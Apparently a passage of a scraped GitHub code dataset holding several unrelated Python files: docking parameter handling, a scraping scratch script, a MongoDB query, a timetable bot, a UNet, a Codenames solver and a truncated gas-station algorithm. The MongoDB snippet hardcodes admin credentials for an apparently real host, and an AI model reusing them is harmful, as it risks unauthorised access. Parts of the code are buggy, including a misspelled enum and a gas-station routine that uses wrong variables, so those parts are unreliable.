_count_gets(log_capture.records, e_table.name)\n metastore_gets = _count_gets(log_capture.records, metastore._table.name)\n\n assert primary_gets == 6\n assert metastore_gets == 1\n\n finally:\n e_table.delete_item(Key=TEST_KEY)\n","repo_name":"aws/aws-dynamodb-encryption-python","sub_path":"test/functional/functional_test_utils.py","file_name":"functional_test_utils.py","file_ext":"py","file_size_in_byte":35601,"program_lang":"python","lang":"en","doc_type":"code","stars":92,"dataset":"github-code","pt":"72"} +{"seq_id":"73966067434","text":"from typing import List, Tuple, Union\nfrom copy import deepcopy\n\nimport pandas as pd\n\nfrom pydock3.config import flatten_param_dict\nfrom pydock3.util import get_nested_dict_item, set_nested_dict_item\n\n\nclass ParametersManager(object):\n def __init__(self, parameters_dict):\n self._parameters_dict = parameters_dict\n\n @property\n def parameters_dict(self):\n return self._parameters_dict\n\n @property\n def flattened_parameters_dict(self):\n return flatten_param_dict(self._parameters_dict)\n\n\nclass DockoptComponentParametersManager(ParametersManager):\n def __init__(self, parameters_dict, last_component_completed=None):\n #\n if last_component_completed is not None:\n for row_index, row in last_component_completed.load_results_dataframe().head(last_component_completed.top_n).iterrows():\n nested_target_keys_and_value_tuples = self._load_nested_target_keys_and_value_tuples_from_dataframe_row(row, identifier_prefix='parameters.', include_prefix=True)\n for nested_target_keys, value in nested_target_keys_and_value_tuples:\n parameters_dict = self._get_parameters_dict_with_next_step_reference_value_replaced(parameters_dict, nested_target_keys, new_ref=value, old_ref='^')\n\n #\n parameters_dict = self._get_parameters_dict_with_next_step_numerical_operators_applied(parameters_dict)\n\n #\n super().__init__(parameters_dict)\n\n @staticmethod\n def _get_parameters_dict_with_next_step_reference_value_replaced(parameters_dict: dict, nested_target_keys: List[str], new_ref: float, old_ref: str = '^') -> dict:\n \"\"\"Takes a set of parameters, finds the next nested step to be run, and, if it\n contains numerical operators, replaces the `reference_value` of the `target_key`\n with the specified float `new_ref` if `reference_value` matches the string\n `old_ref`.\"\"\"\n\n def traverse(obj):\n if isinstance(obj, dict):\n try:\n nested_target = get_nested_dict_item(obj, nested_target_keys)\n except KeyError:\n for key, value in obj.items():\n obj[key] = traverse(value)\n return obj\n if isinstance(nested_target, dict):\n if 'reference_value' in nested_target and 'arguments' in nested_target and 'operator' in nested_target: # numerical operator detected\n # replace old ref with new ref\n if nested_target['reference_value'] == old_ref:\n obj = set_nested_dict_item(obj, nested_target_keys + ['reference_value'], new_ref)\n else:\n if nested_target == old_ref:\n obj = set_nested_dict_item(obj, nested_target_keys, new_ref)\n return obj\n elif isinstance(obj, list): # obj is sequence\n obj[0] = traverse(obj[0]) # only change next step to be run, which will be found in the first element\n return obj\n else:\n return obj\n\n return traverse(deepcopy(parameters_dict))\n\n @staticmethod\n def _load_nested_target_keys_and_value_tuples_from_dataframe_row(row: pd.Series, identifier_prefix: str = 'parameters.', include_prefix: bool = False) -> List[Tuple[List[str], Union[float, str]]]:\n \"\"\"Loads the parameters in a dataframe row according to the column names.\"\"\"\n\n dic = row.to_dict()\n nested_target_keys_and_value_tuples = [(key.split('.'), value) for key, value in dic.items() if key.startswith(identifier_prefix)]\n\n if not include_prefix:\n nested_target_keys_and_value_tuples = [(x[0][1:], x[1]) for x in nested_target_keys_and_value_tuples]\n\n return nested_target_keys_and_value_tuples\n\n @staticmethod\n def _get_parameters_dict_with_next_step_numerical_operators_applied(parameters_dict: dict) -> dict:\n \"\"\"Takes a set of parameters, finds the next nested step to be run, and, if it\n contains numerical operators, applies them.\"\"\"\n\n def traverse(obj):\n if isinstance(obj, dict):\n if 'reference_value' in obj and 'arguments' in obj and 'operator' in obj: # numerical operator detected\n # apply operators\n if obj['operator'] == '+':\n obj = [float(obj['reference_value']) + float(x) for x in obj['arguments']]\n elif obj['operator'] == '-':\n obj = [float(obj['reference_value']) - float(x) for x in obj['arguments']]\n elif obj['operator'] == '*':\n obj = [float(obj['reference_value']) * float(x) for x in obj['arguments']]\n elif obj['operator'] == '/':\n obj = [float(obj['reference_value']) / float(x) for x in obj['arguments']]\n else:\n raise ValueError(\n f\"Witnessed operator `{obj['operator']}`. Only the following numerical operators are supported: `+`, `-`, `*`, `/`\")\n else:\n for key, value in obj.items():\n obj[key] = traverse(value)\n return obj\n elif isinstance(obj, list): # obj is sequence\n obj[0] = traverse(obj[0]) # only change next step to be run, which will be found in the first element\n return obj\n else:\n return obj\n\n return traverse(deepcopy(parameters_dict))\n","repo_name":"docking-org/pydock3","sub_path":"pydock3/dockopt/parameters.py","file_name":"parameters.py","file_ext":"py","file_size_in_byte":5606,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"72"} +{"seq_id":"73240643113","text":"from selenium import webdriver\nfrom selenium.webdriver.firefox.firefox_binary import FirefoxBinary\nbinary = FirefoxBinary('C:\\\\Program Files\\\\Mozilla Firefox\\\\firefox.exe')\n\ndriver = webdriver.Firefox(firefox_binary=binary, executable_path=r'C:\\\\geckodriver.exe')\n\nfrom urllib.request import urlopen\nfrom urllib.error import HTTPError\nfrom urllib.error import URLError\nfrom bs4 import BeautifulSoup\ntry:\n html = urlopen(\"https://www.python.org/\")\nexcept HTTPError as e:\n print(e)\nexcept URLError:\n print(\"Server down or incorrect domain\")\nelse:\n res = BeautifulSoup(html.read(),\"html5lib\")\n if res.title is None:\n print(\"Tag not found\")\n else:\n print(res.title)","repo_name":"diegooliveira7/Testes_Selenium_Python","sub_path":"scratch_1.py","file_name":"scratch_1.py","file_ext":"py","file_size_in_byte":693,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"4429498483","text":"from pymongo import MongoClient\n\nclient = MongoClient(\"mongodb://admin:123456@dreamatach.com:27017/\")\ncollection = client['blog']['article']\npipeline = [\n {\"$match\": {\"age\": {\"$gte\": \"25\"}}}\n]\nret = collection.aggregate(pipeline)\nfor x in ret:\n print(x)\n","repo_name":"alex90914/python_learn","sub_path":"mongo_test/mongo_query.py","file_name":"mongo_query.py","file_ext":"py","file_size_in_byte":260,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"44375643303","text":"import logging\nimport string\nimport re\nimport json\nimport sys\n\nfrom unibot.urlfetch import fetch\nfrom unibot.cache import cache_for\n\n\nQUERY_ALLOWED_CHARS = string.ascii_letters + string.digits + 'àèéìòù '\nQUERY_MIN_LENGTH = 4\nSCHEDULE_SUBDIR_URL = {'it': 'orario-lezioni', 'en': 'timetable'}\nEXAMS_SUBDIR_URL = {'it': 'appelli', 'en': 'exam-dates'}\nAVAILABLE_CURRICULA_URL = '@@available_curricula?anno={}&curricula='\nSCHEDULE_URL = {'json': '@@orario_reale_json?anno={}&curricula={}',\n 'html': '?anno={}&curricula={}'}\n\n\nclass QueryTooShortError(Exception):\n def __init__(self, query):\n super().__init__(\"Search query '{}' is too short\".format(query))\n\n\nclass CourseNotFoundError(Exception):\n def __init__(self, course_id):\n super().__init__(\"Course '{}' not found\".format(course_id))\n\n\nclass NotSupportedError(Exception):\n def __init__(self, course_id, reason):\n super().__init__(\"Course '{}' is not supported\".format(course_id))\n self.reason = reason\n\n\nclass Course:\n def __init__(self, course_id, title, lang, campus, url, parser='json', url_lastminute=None, supported=True, not_supported_reason=''):\n self.course_id = course_id\n self.title = title\n self.lang = lang\n self.campus = campus\n self.url = url\n self.parser = parser\n self.url_lastminute = url_lastminute\n self.supported = supported\n self.not_supported_reason = not_supported_reason\n\n @property\n def search_name(self):\n return '{} - {} - {}'.format(self.title, self.course_id, self.campus)\n\n def is_supported(self):\n return self.supported\n\n def has_lastminute(self):\n return bool(self.url_lastminute)\n\n def get_url_curricula(self, year):\n if not self.supported:\n raise NotSupportedError(self.course_id, self.not_supported_reason)\n curricula_part = AVAILABLE_CURRICULA_URL.format(year)\n return '{}/{}/{}'.format(self.url, SCHEDULE_SUBDIR_URL[self.lang], curricula_part)\n\n def get_url_schedule(self, year, curricula=''):\n if not self.supported:\n raise NotSupportedError(self.course_id, self.not_supported_reason)\n schedule_part = SCHEDULE_URL[self.parser].format(year, curricula)\n return '{}/{}/{}'.format(self.url, SCHEDULE_SUBDIR_URL[self.lang], schedule_part)\n\n def get_url_exams(self):\n return '{}/{}'.format(self.url, EXAMS_SUBDIR_URL[self.lang])\n\n\nclass CourseRepo:\n def __init__(self, courses):\n self.courses = courses\n\n def get(self, course_id):\n match = next((c for c in self.courses if c.course_id == course_id), None)\n if not match:\n raise CourseNotFoundError(course_id)\n return match\n\n def search(self, query):\n query = ''.join(c if c not in string.punctuation else ' ' for c in query)\n query = ''.join(c for c in query if c in QUERY_ALLOWED_CHARS)\n query = ' '.join(query.split())\n if len(query) < QUERY_MIN_LENGTH:\n raise QueryTooShortError(query)\n query = query.replace(' ', '.*')\n regx = re.compile(query, flags=re.IGNORECASE)\n return [c for c in self.courses if regx.search(c.search_name)]\n\n\n@cache_for(minutes=30)\ndef get_courses():\n try:\n with open('assets/courses.json', 'r') as fp:\n courses = [course_factory(c) for c in json.load(fp)]\n return CourseRepo(courses)\n except Exception as e:\n logging.exception(e)\n sys.exit(1)\n\n\n@cache_for(minutes=60)\ndef get_curricula(course, year):\n return fetch(course.get_url_curricula(year)).json()\n\n\ndef course_factory(course):\n out = Course(course['id'], course['title'], course['lang'],\n course['campus'], course['url'])\n if 'supported' in course:\n out.supported = course['supported']\n out.not_supported_reason = course['not_supported_reason']\n if 'url_lastminute' in course:\n out.url_lastminute = course['url_lastminute']\n if 'parser' in course:\n out.parser = course['parser']\n return out\n","repo_name":"mattiamari/unibot","sub_path":"unibot/unibo/courses.py","file_name":"courses.py","file_ext":"py","file_size_in_byte":4067,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"72"} +{"seq_id":"23210777198","text":"# full assembly of the sub-parts to form the complete net\n\nfrom .unet_parts import *\nimport numpy as np\nfrom .base_network import NetworkBase\n\nclass UNet(NetworkBase):\n def __init__(self, n_channels = 4, n_classes = 3):\n super(UNet, self).__init__()\n self._name = 'unet_generator'\n self.inc = inconv(n_channels, 64)\n self.down1 = down(64, 128)\n self.down2 = down(128, 256)\n self.down3 = down(256, 512)\n self.down4 = down(512, 512)\n self.up1 = up(1024, 256)\n self.up2 = up(512, 128)\n self.up3 = up(256, 64)\n self.up4 = up(128, 64)\n self.outc = outconv(64, n_classes)\n\n def forward(self, x_img, x_real_heatmap, x_desired_heatmap, desired_cond, fixed_noise):\n x_real_heatmap = x_real_heatmap.view(-1,1,128,128)\n x_input = torch.cat([x_img, x_real_heatmap], dim=1)\n # desired_cond = desired_cond.unsqueeze(2).unsqueeze(3)\n # desired_cond = desired_cond.expand(desired_cond.size(0), desired_cond.size(1), x_img.size(2), x_img.size(3))\n \n #x_input = torch.cat([x_img, desired_cond], dim=1)\n x1 = self.inc(x_input)\n x2 = self.down1(x1)\n x3 = self.down2(x2)\n x4 = self.down3(x3)\n x5 = self.down4(x4)\n x = self.up1(x5, x4)\n x = self.up2(x, x3)\n x = self.up3(x, x2)\n x = self.up4(x, x1)\n x = self.outc(x)\n return x, x1","repo_name":"SonDaoDuy/GAN-for-face-rotation","sub_path":"networks/unet.py","file_name":"unet.py","file_ext":"py","file_size_in_byte":1417,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"28598322559","text":"# type: ignore\nimport itertools\nimport logging\nimport os\nfrom dataclasses import dataclass\nfrom datetime import datetime\nfrom typing import Dict, Iterable, List, Optional, Tuple\n\nimport community\nimport matplotlib.pyplot as plt\nimport networkx as nx\nimport numpy as np\nimport pandas as pd\nfrom gensim.models import KeyedVectors\nfrom pandas import Series\n\nfrom codenames.game import Board, CardColor, Hint, Hinter, HinterGameState, WordGroup\nfrom codenames.solvers.naive.naive_hinter import (\n Proposal,\n default_proposal_grade_calculator,\n)\nfrom codenames.solvers.utils.algebra import cosine_distance, single_gram_schmidt\nfrom codenames.utils import RUN_ID, get_exports_folder\nfrom language_data.model_loader import load_language\n\nplt.style.use(\"fivethirtyeight\")\n\n\n@dataclass\nclass ForceNode:\n force_origin: np.array\n force_sign: True\n force_size: Optional[float] = None\n\n\nlog = logging.getLogger(__name__)\nMIN_SELF_BLACK_DELTA = 0.07\nMIN_SELF_OPPONENT_DELTA = 0.04\nMIN_SELF_GRAY_DELTA = 0.01\nMAX_SELF_DISTANCE = 0.235\nOPPONENT_FORCE_CUTOFF = 0.275\nOPPONENT_FORCE_FACTOR = 1.6\nFRIENDLY_FORCE_CUTOFF = 0.2\nFRIENDLY_FORCE_FACTOR = 1\nBLACK_FORCE_FACTOR = 2\nGRAY_FORCE_FACTOR = 1.2\nEPSILON = 0.001\n\nBANNED_WORDS = {\"slackerjack\"}\nSimilarity = Tuple[str, float]\n\n\n# Test\n\n\ndef _invert_dict(original: dict) -> dict:\n inverted = {}\n for new_value, new_key in original.items():\n inverted.setdefault(new_key, [])\n inverted[new_key].append(new_value)\n return inverted\n\n\ndef should_filter_word(word: str, filter_expressions: Iterable[str]) -> bool:\n if \"_\" in word:\n return True\n if word in BANNED_WORDS:\n return True\n for bad_word in filter_expressions:\n if word in bad_word or bad_word in word:\n return True\n return False\n\n\ndef step_away(starting_point: np.array, step_away_from: np.array, arc_radians: float) -> np.array:\n cos_phase = (starting_point.T @ step_away_from) / (np.linalg.norm(step_away_from) * np.linalg.norm(starting_point))\n\n original_phase = np.arccos(np.clip(cos_phase, -1.0, 1.0))\n\n step_away_from, normed_o = single_gram_schmidt(step_away_from, starting_point)\n\n rotated = step_away_from * np.cos(original_phase + arc_radians) + normed_o * np.sin(original_phase + arc_radians)\n\n rotated_original_size = rotated * np.linalg.norm(starting_point)\n\n return rotated_original_size\n\n\ndef step_towards(starting_point: np.array, step_away_from: np.array, arc_radians: float) -> np.array:\n return step_away(starting_point, step_away_from, -arc_radians)\n\n\ndef sum_forces(starting_point: np.array, nodes) -> np.array: # : List[ForceNode,...]\n total_force = np.zeros(nodes[0].force_origin.shape)\n for node in nodes:\n rotated = step_away(starting_point, node.force_origin, node.force_size * EPSILON)\n contribution = rotated - starting_point\n np.set_printoptions(precision=6)\n total_force += contribution\n return total_force\n\n\ndef step_from_forces(\n starting_point: np.array, nodes, arc_radians: float\n) -> np.array: #: List[Tuple[np.array, float], ...]\n net_force = sum_forces(starting_point, nodes)\n force_size = np.linalg.norm(net_force)\n direction_vector = starting_point + net_force\n rotated = step_towards(starting_point, direction_vector, force_size * arc_radians / EPSILON)\n return rotated\n\n\ndef friendly_force(d):\n if d > FRIENDLY_FORCE_CUTOFF:\n return 0\n else:\n # Parabola with 0 at d=0, 1 at d=FRIENDLY_FORCE_CUTOFF and else otherwise:\n return FRIENDLY_FORCE_FACTOR * (\n 1 - (d / FRIENDLY_FORCE_CUTOFF - 1) ** 2\n ) # FRIENDLY_FORCE_FACTOR * d / FRIENDLY_FORCE_CUTOFF\n\n\ndef repelling_force(d, cutoff_distance, factor):\n if d > OPPONENT_FORCE_CUTOFF:\n return 0\n else:\n a = factor / (factor - 1) * cutoff_distance\n return a / (d + a / factor)\n\n\ndef opponent_force(d: float):\n return repelling_force(d, OPPONENT_FORCE_CUTOFF, OPPONENT_FORCE_FACTOR)\n\n\ndef gray_force(d):\n return repelling_force(d, OPPONENT_FORCE_CUTOFF, GRAY_FORCE_FACTOR)\n\n\ndef black_force(d):\n return repelling_force(d, OPPONENT_FORCE_CUTOFF, BLACK_FORCE_FACTOR)\n\n\ndef _format_word(word: str) -> str:\n return word.replace(\" \", \"_\").replace(\"-\", \"_\").strip()\n\n\n@dataclass\nclass Cluster:\n id: int\n df: pd.DataFrame\n centroid: Optional[np.array] = None\n grade: float = 0\n\n @property\n def words(self) -> WordGroup:\n return tuple(self.df.index)\n\n @property\n def default_centroid(self) -> np.array:\n mean = np.mean(self.df[\"vector_normed\"])\n normalized_mean = mean / np.linalg.norm(mean)\n return normalized_mean\n\n def update_distances(self):\n self.df[\"centroid_distance\"] = self.df[\"vector\"].apply(lambda v: cosine_distance(v, self.centroid))\n\n def sort_by_distances(self):\n self.df.sort_values(\"centroid_distance\", inplace=True)\n\n def reset(self):\n self.centroid = self.default_centroid\n self.update_distances()\n self.sort_by_distances()\n\n def __gt__(self, cluster_2):\n return self.grade > cluster_2.grade\n\n def __lt__(self, cluster_2):\n return self.grade < cluster_2.grade\n\n\nclass SnaHinter(Hinter):\n def __init__(self, name: str, debug_mode=False, physics_optimization=True):\n super().__init__(name=name)\n self.model: Optional[KeyedVectors] = None\n self.language_length: Optional[int] = None\n self.board_data: Optional[pd.DataFrame] = None\n self.graded_proposals: List[Cluster] = []\n self.debug_mode = debug_mode\n self.physics_optimization = physics_optimization\n self.game_state: Optional[HinterGameState] = None\n\n def on_game_start(self, language: str, board: Board):\n self.model = load_language(language=language) # type: ignore\n self.language_length = len(self.model.index_to_key)\n all_words = [_format_word(word) for word in board.all_words]\n vectors = self.model[all_words]\n vectors_list = list(vectors)\n vectors_list_normed = [v / np.linalg.norm(v) for v in vectors_list]\n self.board_data = pd.DataFrame(\n data={\n \"color\": board.all_colors,\n \"is_revealed\": board.all_reveals,\n \"vector\": vectors_list,\n \"vector_normed\": vectors_list_normed,\n \"cluster\": None,\n \"distance_to_centroid\": None,\n },\n index=board.all_words,\n )\n\n @property\n def unrevealed_cards(self) -> pd.DataFrame:\n return self.board_data[self.board_data[\"is_revealed\"] == False] # noqa: E712\n\n @property\n def own_unrevealed_cards(self) -> pd.DataFrame:\n own_unrevealed_idx = (self.board_data.is_revealed == False) & ( # noqa: E712\n self.board_data.color == self.team_color.as_card_color\n )\n return self.board_data[own_unrevealed_idx]\n\n @property\n def opponent_cards(self) -> pd.DataFrame:\n return self.board_data[self.board_data[\"color\"] == self.team_color.opponent.as_card_color]\n\n @property\n def gray_cards(self) -> pd.DataFrame:\n return self.board_data[self.board_data[\"color\"] == CardColor.GRAY]\n\n @property\n def own_cards(self) -> pd.DataFrame:\n return self.board_data[self.board_data[\"color\"] == self.team_color]\n\n @property\n def black_card(self) -> pd.DataFrame:\n return self.board_data[self.board_data[\"color\"] == CardColor.BLACK]\n\n @property\n def bad_cards(self) -> pd.DataFrame:\n return self.board_data[\n self.board_data[\"color\"].isin([CardColor.GRAY, CardColor.BLAC, self.team_color.opponent.as_card_color])\n ]\n\n def update_reveals(self, game_state):\n mapper = {card.word: card.revealed for card in game_state.board}\n self.board_data[\"is_revealed\"] = self.board_data.index.map(mapper)\n\n def pick_hint(self, game_state: HinterGameState) -> Hint:\n self.game_state = game_state\n self.update_reveals(game_state)\n graded_proposals = self.generate_graded_proposals()\n graded_proposals.sort(key=lambda p: -p.grade)\n best_n_repr = \"\\n\".join(str(p) for p in graded_proposals[:3])\n log.info(f\"Best proposals: \\n{best_n_repr}\")\n best_proposal = graded_proposals[0]\n # draw_cluster = Cluster(\n # -1,\n # self.board_data[self.board_data.index.isin(best_proposal.word_group)],\n # self.model.get_vector(best_proposal.hint_word),\n # )\n # self.draw_guesser_view(draw_cluster, best_proposal.hint_word, self.model.get_vector(best_proposal.hint_word))\n hint = Hint(best_proposal.hint_word, best_proposal.card_count)\n return hint\n\n def generate_graded_proposals(self, resolution_parameter=1):\n self.divide_to_clusters(df=self.own_unrevealed_cards, resolution_parameter=resolution_parameter)\n graded_proposals = []\n unique_clusters_ids = pd.unique(self.own_unrevealed_cards.cluster)\n for cluster_id in unique_clusters_ids:\n df = self.own_unrevealed_cards.loc[self.own_unrevealed_cards.cluster == cluster_id, :]\n cluster = Cluster(id=cluster_id, df=df.copy(deep=True))\n proposal = self.proposal_from_cluster(cluster)\n graded_proposals.append(proposal)\n draw_cluster = Cluster(\n -1,\n self.board_data[self.board_data.index.isin(proposal.word_group)],\n self.model.get_vector(proposal.hint_word),\n )\n self.draw_guesser_view(draw_cluster, proposal.hint_word, self.model.get_vector(proposal.hint_word))\n graded_proposals.sort(key=lambda c: -c.grade)\n return graded_proposals\n\n def proposal_from_cluster(self, cluster: Cluster):\n self.optimize_cluster(cluster)\n similarities: List[Similarity] = self.model.most_similar(cluster.centroid, topn=100)\n best_proposal = self.pick_best_similarity(\n similarities=similarities,\n words_to_filter_out=self.game_state.illegal_words,\n )\n return best_proposal\n\n def pick_best_similarity(\n self, similarities: List[Similarity], words_to_filter_out: Iterable[str]\n ) -> Optional[Proposal]:\n words_to_filter_out = {word.lower() for word in words_to_filter_out}\n filtered_proposals = []\n for similarity in similarities:\n word, grade = similarity\n word = word.lower()\n if should_filter_word(word, words_to_filter_out):\n continue\n vector = self.model.get_vector(word)\n proposal = self.proposal_from_word_vector(word, vector)\n filtered_proposals.append(proposal)\n if len(filtered_proposals) == 0:\n return None\n best_proposal = min(filtered_proposals, key=lambda p: -p.grade)\n return best_proposal\n\n def proposal_from_word_vector(self, word: str, vector: np.ndarray) -> Proposal:\n self.update_distances(vector)\n temp_df = self.unrevealed_cards.sort_values(\"distance_to_centroid\")\n centroid_to_black = np.min( # This min is required for the float type\n cosine_distance(vector, temp_df[temp_df[\"color\"] == CardColor.BLACK][\"vector\"])\n )\n centroid_to_gray = np.min(cosine_distance(vector, temp_df[temp_df[\"color\"] == CardColor.GRAY][\"vector\"]))\n centroid_to_opponent = np.min(\n cosine_distance(\n vector,\n temp_df[temp_df[\"color\"] == self.team_color.opponent.as_card_color][\"vector\"],\n )\n )\n\n bad_cards_limitation = np.min(\n [\n centroid_to_black - MIN_SELF_BLACK_DELTA,\n centroid_to_gray - MIN_SELF_GRAY_DELTA,\n centroid_to_opponent - MIN_SELF_OPPONENT_DELTA,\n ]\n )\n\n chosen_cards = temp_df[\n (temp_df[\"distance_to_centroid\"] < bad_cards_limitation)\n & (temp_df[\"distance_to_centroid\"] < MAX_SELF_DISTANCE)\n & (temp_df[\"color\"] == self.team_color.as_card_color)\n ]\n\n distance_group = np.max(chosen_cards[\"distance_to_centroid\"])\n\n if self.debug_mode is True:\n draw_cluster = Cluster(0, chosen_cards)\n draw_cluster.reset()\n self.draw_guesser_view(cluster=draw_cluster, word=word, vector=vector)\n\n proposal = Proposal(\n word_group=chosen_cards.index.to_list(),\n hint_word=word,\n hint_word_frequency=0,\n distance_group=distance_group,\n distance_gray=centroid_to_gray,\n distance_opponent=centroid_to_opponent,\n distance_black=centroid_to_black,\n )\n proposal.grade = default_proposal_grade_calculator(proposal)\n\n return proposal\n\n def force_from_color(self, centroid: np.ndarray, card_row: Series):\n vector, card_color = card_row[\"vector\"], card_row[\"color\"]\n d = cosine_distance(centroid, vector)\n if card_color == self.team_color.opponent.as_card_color:\n return opponent_force(d)\n elif card_color == CardColor.BLACK:\n return black_force(d)\n elif card_color == CardColor.GRAY:\n return gray_force(d)\n elif card_color == self.team_color.as_card_color:\n return friendly_force(d)\n else:\n raise ValueError(f\"color{card_row['color']} is not a valid color\")\n\n def board_df2nodes(self, centroid: np.array): # -> List[Tuple[np.array, float], ...]:\n relevant_df = self.board_data[self.board_data[\"is_revealed\"] == False] # noqa: E712\n relevant_df[\"force\"] = relevant_df.apply(lambda row: self.force_from_color(centroid, row), axis=1)\n relevant_df = relevant_df[[\"vector\", \"force\"]]\n tuples_list = list(relevant_df.itertuples(index=False, name=None))\n nodes_list = [\n ForceNode(force_origin=element[0], force_sign=True, force_size=element[1]) for element in tuples_list\n ]\n return nodes_list\n\n def optimization_break_condition(self, cluster: Cluster) -> bool:\n self.update_distances(cluster.centroid)\n distances2opponent = self.extract_centroid_distances(self.team_color.opponent.as_card_color)\n distances2own = self.extract_centroid_distances(self.team_color.as_card_color)\n distances2own = distances2own[distances2own.index.isin(cluster.df.index.to_list())]\n distance2black = self.extract_centroid_distances(CardColor.BLACK)\n distances2gray = self.extract_centroid_distances(CardColor.GRAY)\n max_distance2own = max(distances2own)\n if (\n (min(distances2opponent) - max_distance2own > MIN_SELF_OPPONENT_DELTA)\n and (distance2black[0] - max_distance2own > MIN_SELF_OPPONENT_DELTA)\n and (min(distances2gray) - max_distance2own > MIN_SELF_GRAY_DELTA)\n and (max_distance2own < MAX_SELF_DISTANCE)\n ):\n return True\n else:\n return False\n\n def optimize_cluster(self, cluster: Cluster) -> Cluster:\n cluster.reset()\n if self.debug_mode is True:\n self.draw_guesser_view(cluster)\n for i in range(100):\n self.clean_cluster(cluster)\n if self.debug_mode is True:\n self.draw_guesser_view(cluster)\n if self.optimization_break_condition(cluster):\n break\n if self.physics_optimization:\n nodes = self.board_df2nodes(cluster.centroid)\n cluster.centroid = step_from_forces(cluster.centroid, nodes, arc_radians=5e-2)\n if self.debug_mode is True:\n self.draw_guesser_view(cluster)\n return cluster\n\n def extract_centroid_distances(self, color: CardColor):\n relevant_df = self.board_data[self.board_data[\"is_revealed\"] == False] # noqa: E712\n if color == CardColor.GRAY:\n color_rows = relevant_df.color == CardColor.GRAY\n elif color == CardColor.BLACK:\n color_rows = relevant_df.color == CardColor.BLACK\n elif color == self.team_color.opponent.as_card_color:\n color_rows = relevant_df.color == self.team_color.opponent.as_card_color\n elif color == self.team_color.as_card_color:\n color_rows = relevant_df.color == self.team_color.as_card_color\n elif color == CardColor.BAD: # TODO: What is this?\n color_rows = relevant_df.color.isin(\n [CardColor.GRAY, CardColor.BLACK, self.team_color.opponent.as_card_color]\n )\n else:\n raise ValueError(f\"No such color as {color}\")\n return relevant_df.loc[color_rows, \"distance_to_centroid\"]\n\n def update_distances(self, centroid):\n self.board_data[\"distance_to_centroid\"] = self.board_data[\"vector\"].apply(\n lambda v: cosine_distance(v, centroid)\n )\n\n @staticmethod\n def clean_cluster(cluster: Cluster):\n cluster.update_distances()\n centroid_distances = cluster.df[\"centroid_distance\"]\n max_distance = max(centroid_distances)\n central_words = (centroid_distances < MAX_SELF_DISTANCE) | (centroid_distances != max_distance)\n cluster.df = cluster.df[central_words]\n cluster.centroid = cluster.default_centroid\n\n def draw_centroid_distances(self, ax, cluster: Cluster, centroid=None, title=None):\n if centroid is None:\n self.update_distances(cluster.centroid)\n else:\n self.update_distances(centroid)\n\n temp_df = self.unrevealed_cards.sort_values(\"distance_to_centroid\")\n temp_df[\"colors\"] = temp_df[\"color\"].apply(lambda x: x.value.lower())\n temp_df[\"is_in_cluster\"] = temp_df.index.isin(cluster.df.index)\n temp_df[\"edge_color\"] = temp_df[\"is_in_cluster\"].apply(lambda x: \"yellow\" if x else \"black\")\n temp_df[\"line_width\"] = temp_df[\"is_in_cluster\"].apply(lambda x: 3 if x else 1)\n\n ax.bar(\n x=temp_df.index,\n height=temp_df[\"distance_to_centroid\"],\n color=temp_df[\"colors\"],\n edgecolor=temp_df[\"edge_color\"],\n linewidth=temp_df[\"line_width\"],\n )\n plt.setp(ax.get_xticklabels(), rotation=45)\n ax.set_title(title)\n file_name = f\"{datetime.now().timestamp()}-{title}\"\n if file_name != \"no\":\n export_folder = get_exports_folder(\"sna\", RUN_ID)\n export_file = os.path.join(export_folder, file_name)\n temp_df.to_csv(f\"{export_file}.csv\")\n plt.savefig(f\"{export_file}.png\")\n plt.show()\n\n def draw_guesser_view(self, cluster: Cluster, word=None, vector=None):\n if word is None:\n fig, ax = plt.subplots(1, 1, figsize=(15, 8))\n self.draw_centroid_distances(ax, cluster, title=\"Cluster centroid\")\n else:\n fig, ax = plt.subplots(1, 1, figsize=(15, 8))\n self.draw_centroid_distances(ax, cluster, centroid=vector, title=f\"hint word: {word}\")\n # self.draw_centroid_distances(ax[1], cluster, title=\"Cluster centroid\")\n\n def divide_to_clusters(self, df: pd.DataFrame, resolution_parameter=1):\n vis_graph = nx.Graph()\n words = df.index.to_list()\n vis_graph.add_nodes_from(words)\n louvain = nx.Graph(vis_graph)\n for word_couple in itertools.combinations(words, 2):\n v, u = _format_word(word_couple[0]), _format_word(word_couple[1])\n distance = self.model.similarity(v, u) + 1\n if distance > 1.1:\n vis_graph.add_edge(v, u, weight=distance)\n louvain_weight = distance ** (2 * resolution_parameter)\n louvain.add_edge(v, u, weight=louvain_weight)\n\n word_to_group: Dict[str, int] = community.best_partition(louvain)\n self.board_data.cluster = self.board_data.index.map(word_to_group)\n","repo_name":"mkali-personal/codenames","sub_path":"codenames/solvers/sna_hinter.py","file_name":"sna_hinter.py","file_ext":"py","file_size_in_byte":19867,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"16245751187","text":"\"\"\"\nMinimum maximum distance between gas station.\n\"\"\"\n\nimport heapq\n\n\nclass Solution:\n def __init__(self, arr: list[int]) -> None:\n self.arr: list[int] = arr\n self.n = len(self.arr)\n\n def minimize_max_distance(self, k: int) -> float:\n how_many: list[int] = [0] * (self.n - 1)\n for gas_station in range(1, k + 1):\n max_section: int = -1\n max_ind: int = -1\n for i in range(0, self.n - 1, 1):\n diff: int = self.arr[i + 1] - self.arr[i]\n section_length: int = diff / (how_many[i] + 1)\n\n if section_length > max_section:\n max_section = section_length\n max_ind = i\n\n how_many[max_ind] += 1\n\n max_ans: float = -1\n for i in range(0, self.n - 1, 1):\n diff: int = self.arr[i + 1] - arr[i]\n section_length: float = diff / (how_many[i] + 1)\n max_ans = max(max_ans, section_length)\n\n return max_ans\n\n def minimize_max_distance_better(self, k: int) -> float:\n how_many = [0] * (self.n - 1)\n pq = []\n # insert the first n-1 elements into pq\n # with respective distance values:\n for i in range(self.n - 1):\n heapq.heappush(pq, ((-1) * (self.arr[i + 1]), i))\n\n # pick and place the k gas station\n for gas_station in range(1, k + 1):\n # find the maximum section\n # and insert the gas station\n tp = heapq.heappop(pq)\n sec_ind = tp[1]\n\n # insert the current gas station\n how_many[sec_ind] += 1\n initial_diff = self.arr[sec_ind + 1] - self.arr[sec_ind]\n new_section_length = initial_diff / (how_many[sec_ind] + 1)\n heapq.heappush(pq, (new_section_length * (-1), sec_ind))\n\n return 